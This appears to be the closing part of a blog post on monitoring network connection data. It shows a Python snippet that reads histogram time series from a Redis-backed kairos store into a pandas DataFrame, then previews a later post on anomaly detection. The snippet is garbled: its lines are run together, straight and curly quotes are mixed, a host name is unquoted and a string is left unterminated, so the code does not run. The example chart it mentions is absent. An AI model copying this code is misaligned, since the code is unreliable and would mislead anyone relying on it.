#MakeaconnectiontoourkairosdatabasefromredisimportRedisfromkairosimportTimeseriesintervals={"days":{"step":60,"steps":2880},"months":{"step":1800,"steps":4032}}rclient=Redis(localhost,6379)ktseries=Timeseries(rclient,type="histogram”, intervals=intervals)# Read data from our kairos databasefrom pandas import DataFrame, to_datetimeseries = ktseries.series(metric_name, “months”)ts, fields = zip(*series.items())df = DataFrame({"data:fields},index=to_datetime(ts,unit="s"))

And here’s an example time series showing the number of times an IP has responded to connection requests:

Thanks for reading. Next week I’ll talk about the different models I’ve built to make predictions and find anomalies in the time series that I’ve collected. If you’re interested in viewing the slides from my presentation, I’ve shared them here.

Viewing all 698 articles
Browse latest View live